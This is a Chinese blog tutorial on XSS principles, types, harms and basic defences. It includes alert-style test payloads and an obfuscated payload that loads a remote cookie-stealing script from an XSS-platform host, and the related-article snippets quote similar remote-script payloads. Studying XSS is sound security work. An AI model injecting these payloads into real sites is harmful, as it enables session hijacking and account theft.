【渗透测试】XSS注入原理

最新推荐文章于 2024-04-26 16:35:31 发布
最新推荐文章于 2024-04-26 16:35:31 发布
阅读量2.9k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 前端 xss web安全 渗透测试 XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41691212/article/details/122514293
版权

目录

XSS注入原理

XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 XSS 攻击。

XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。

<script>alert(/XSS/)</script>
<script>console.log(1);</script>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>

XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。

关键点:我们输入的内容一定要是前端代码。

我们能输入的地方:

①.网站给我们提供的框框(搜索框)

②.网址的参数的值

XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。

	<font color='#ff6600'>非注册会员不可设</font>

	<script>alert(/cccccccccccc/)</script> # 作用:弹框

前端代码:html、css、【javascript】。

XSS的危害:

1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号

2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力

3、盗窃企业重要的具有商业价值的资料

4、非法转账

5、强制发送电子邮件(钓鱼)

6、网站挂马

7、控制受害者机器(肉鸡)向其它网站发起攻击

XSS分类

反射型的XSS:你输入的前端代码只执行了一次的就叫做反射型的XSS。

存储型的XSS:你输入的前端代码被目标网站存进了数据库里面,导致其他用户访问一次执行一次。

XSS平台——漏洞利用

XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。

无keepsession:半个小时,Cookie失效就失效了。

keepsession:保持Cookie的有效性。

</tExtArEa>'"><sCRiPt sRC=//xss8.cc/OAL5></sCrIpT>

短网址的方式

总结

1.XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。

2.XSS分类:反射型的XSS、【存储型的XSS】

3.XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。

答疑

1.&是什么?

keyword=你懂得&enc=utf-8&wq=XSS&pvid=50ff619dd1314c188a33df5ded7b6842

& 相当于 “和”/ and

2.里面的斜杠是双单引号?

语法格式

3.没有授权咋实战?

只能打靶

4.为什么第一次不行,这次好了。问题出在哪里?

复制的时候出了问题。

beef就是一个利用XSS漏洞的工具。

5.可以直接以QQ号主模式登录他QQ空间不?

XSS漏洞还是偏向于社工型。理论上是可以的。

6.那xss怎么去防范呢?

控制输入和输出。

开发人员应该该做的

输入处过滤。

输出处编码。

粥粥粥少女的拧发条鸟
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
XSS(跨站脚本攻击)详解
谢公子的博客
09-08 7万+
目录 XSS原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS原理和分类 跨站脚本攻击XSS(Cros...
XSS注入原理与实现
LJH1999ZN的博客
02-17 4447
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
安全-反射性xss基础注入
m0_63069714的博客
11-08 353
题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。
XSS注入(跨站脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1527
XSS注入是一种最普遍的网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
XSS注入基础入门篇
好好睡觉
02-17 4885
XSS注入基础,XSS注入原理XSS注入分类
安全路上慢慢走,持续更新
vikesgao
03-24 932
某天早上打开邮箱看到网警邮件告知”跨站脚本攻击“---XSS 威胁描述:跨站脚本攻击简称为 XSS 又叫 CSS (Cross Site Script Execution),是指服务器端的 CGI 程序没有对用户提交的变量中的 HTML 代码进行有效的过滤或转换,允许攻击者往 WEB 页面里插入 对终端用户造成影响或损失的 HTML 代码。所造成的影响主要是窃 取用户登录凭证(C...
网络渗透测试环境安装包
01-14
渗透测试人员可以通过尝试攻击这些漏洞,熟悉它们的工作原理,提升自己的安全测试技能。DVWA的每个漏洞都有不同的难度级别,使得初学者和专业人士都能从中受益。 Mutillidae是另一个开源的Web渗透测试靶场,它是...
渗透测试流程.zip
04-06
此外,熟悉各类攻防技术、熟悉常见的Web应用漏洞(如SQL注入XSS、CSRF等)、了解操作系统和网络原理也是必备技能。 总的来说,渗透测试是一门综合性的技能,涉及众多网络安全知识和技术,对工程师的理论素养和...
web渗透测试靶机(新手)
05-07
"626包厢"可能是一个虚拟机或靶场环境的名字,其中包含了多个Web应用程序,用于实践SQL注入、跨站脚本(XSS)、文件包含、命令注入等常见的渗透测试技术。这个环境可以帮助新手了解如何利用这些漏洞,并学习如何防止...
web安全渗透测试.7z
04-08
Web安全领域,渗透测试常常涵盖SQL注入XSS攻击、文件包含漏洞、命令注入、权限绕过等测试项目。 【压缩包子文件的文件名称列表】 1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的...
读书笔记之python渗透测试.docx
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
XSS漏洞
weixin_45870282的博客
02-05 639
一般我们在判断是否存在xss的时候,会首先输入类似于下面的字符串:123456”’ 然后右键查看源代码,看我们输入的特殊字符串是否在页面中显示,如果没显示,则可能存在dom型xss,也有可能不存在xss.如果存在,重点看我们输入的特殊的字符是否被转义,如果没被转义,基本上可以判断存在xss,剩下的只是如何构造的问题.如果被转义了,则需要首先看是所有的都被转义了,还是部分,如果是部分,则考虑当前位置能否使用未转义的符号进行拼接.javaScript中的同源,需要对比 两者中的协议、域名、端口。
WEB安全XSS漏洞与SQL注入漏洞介绍及解决方案
m0_74131821的博客
04-18 1770
这篇文章把XSS跨站攻击和SQL注入的相关知识整理了下,比较适合初学者观看。
XSS(跨站脚本攻击)漏洞理解
向上的"狼"的博客
07-16 2362
XSS(跨站脚本攻击)漏洞理解
js 前端处理xss攻击,对危险的字符串进行过滤
PrimaryColor
04-01 6034
es6: npm install xss --save 这里测试使用的是es5,下载链接: https://download.csdn.net/download/qq_42740797/16291859 https://raw.githubusercontent.com/leizongmin/js-xss/master/dist/xss.js(过滤的比较严重,将html的所有属性都给过滤了) 调用函数: function filterXSS(string) html: <!.
XSS
weixin_46928280的博客
08-01 1214
xss漏洞的原理、形成的原因、危害、攻击类型(存储型、反射型、Dom型)、防御方式、手工挖掘、工具挖掘
跨站脚本攻击XSS
qq_45557130的博客
10-16 1410
xss
xss攻击与解决方法!
u012572955的专栏
12-02 814
xss攻击即跨站脚本攻击(cross site script),指黑客通过篡改网页,注入恶意html脚本,控制用户浏览器进行恶意操作的一种方式! 常见的xss攻击类型有两种,一种是反射型:攻击者诱使用户点击一个嵌入恶意脚本的链接,达到攻击目的。 另一种是持久型xss攻击,黑客提交含有恶意脚本的请求,请求被 保存在web站点的数据库。当用户访问页面查询该条数据的时候, 该脚本会被浏览器执行。
xss跨站脚本***大全
weixin_34331102的博客
03-20 452
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
渗透测试XSS基础知识
07-23
XSS(Cross-Site Scripting)是一种常见的网站安全漏洞,攻击者通过在网页中注入恶意脚本来攻击用户。...在进行渗透测试时,理解 XSS 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 XSS 漏洞。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

粥粥粥少女的拧发条鸟

你的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值